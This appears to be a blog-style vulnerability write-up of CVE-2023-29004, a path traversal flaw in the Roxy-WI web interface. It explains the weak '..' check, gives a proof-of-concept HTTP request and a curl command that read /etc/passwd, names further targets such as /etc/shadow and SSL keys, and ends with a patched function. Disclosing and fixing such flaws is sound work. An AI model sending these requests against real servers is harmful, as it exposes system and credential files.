CVE-2023-29004 - Path Traversal Vulnerability in Roxy-WI Allows Arbitrary File Read

Roxy-WI is a popular open-source web interface used to manage Haproxy, Nginx, Apache, and Keepalived servers, making it a critical component in many IT operations environments. In March 2023, a serious security vulnerability was found in Roxy-WI version 6.3.9.—the latest version at the time. This vulnerability (CVE-2023-29004) puts sensitive information at risk, as it can be exploited for arbitrary file reads on the server.

This post explains how the vulnerability works, includes code snippets for better understanding, and demonstrates how the exploit might be used in the real world.

What is Path Traversal?

Path traversal (also called directory traversal) is a type of security flaw that allows attackers to access files and directories outside the intended directory. This is done by manipulating variables that reference files with sequences like ../ or by specifying absolute paths.

If a web application allows user input to dictate what file to read or write—without properly limiting what paths are allowed—an attacker can use this to access files such as /etc/passwd or application secrets.

The vulnerability occurs in the endpoint

/app/options.py

Through the config_file_name parameter, a user can specify what file to read. This parameter is passed to the function get_config in /app/modules/config/config.py.

Here is a simplified look at the affected function

def get_config(config_file_name):
    if '..' in config_file_name:
        raise ValueError("Relative path traversal detected")
    with open(config_file_name) as f:
        return f.read()

The developer tries to prevent directory traversal by banning the use of .., but

- It does not check for absolute paths (like /etc/passwd).

It only bans one traversal pattern.

So, if an attacker sets config_file_name to an absolute path (for example, /etc/passwd), get_config will read and return any file that the web server's process user can access!

You need to be authenticated as a regular (user-level) user to exploit this.

Imagine you want to read /etc/passwd from the server running Roxy-WI. You could send this HTTP request:

GET /app/options.py?config_file_name=/etc/passwd HTTP/1.1
Host: target.com
Cookie: session=validusercookie

If vulnerable, the contents of /etc/passwd will be returned in the web interface or the HTTP response.

With Curl

curl -b "session=validusercookie" "http://target.com/app/options.py?config_file_name=/etc/passwd";

If successful, you'll see lines like

root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Why It Happens: Weak Validation

The code only looks for .. and doesn't realize that simply providing an absolute path (/etc/shadow, /var/www/.env, etc.) is just as dangerous. It also doesn't sanitize or limit what kind of files can be accessed. There is no whitelist or sandboxing of locations.

Attackers with user-level access can

- Steal sensitive system files (/etc/passwd, logs, SSL keys)

Get a foothold for further privilege escalation

Risk: Depending on file permissions, confidential and system-critical data may be exposed.

Responsible Use & Mitigation

If you use Roxy-WI, update to the latest fixed version as soon as a patch is released.

Restrict access to Roxy-WI interface to trusted users and networks only

- Monitor logs for unusual requests to /app/options.py

References & More Reading

- GitHub Roxy-WI project
- Original CVE-2023-29004 Entry  
- OWASP: Path Traversal

Improve the get_config function to only allow reading from well-defined, allowed directories

import os

def get_config(config_file_name):
    allowed_dir = "/etc/roxy-wi/configs/"
    requested = os.path.abspath(os.path.join(allowed_dir, config_file_name))
    if not requested.startswith(allowed_dir):
        raise ValueError('Not allowed')
    with open(requested) as f:
        return f.read()

This change ensures that only files within the intended directory can be read, and arbitrary/absolute paths will never escape the allowed location.

Conclusion

CVE-2023-29004 is a critical path traversal vulnerability in Roxy-WI that allows attackers to read any file accessible by the web server process, just by crafting a clever HTTP request. Admins should upgrade and secure their Roxy-WI instances asap.

Stay safe, and always validate and sanitize user input!


*This post is an exclusive and simplified explanation. Please refer to the official CVE listing and Roxy-WI releases for the latest updates.*

Timeline

Published on: 04/17/2023 19:15:00 UTC
Last modified on: 04/26/2023 19:34:00 UTC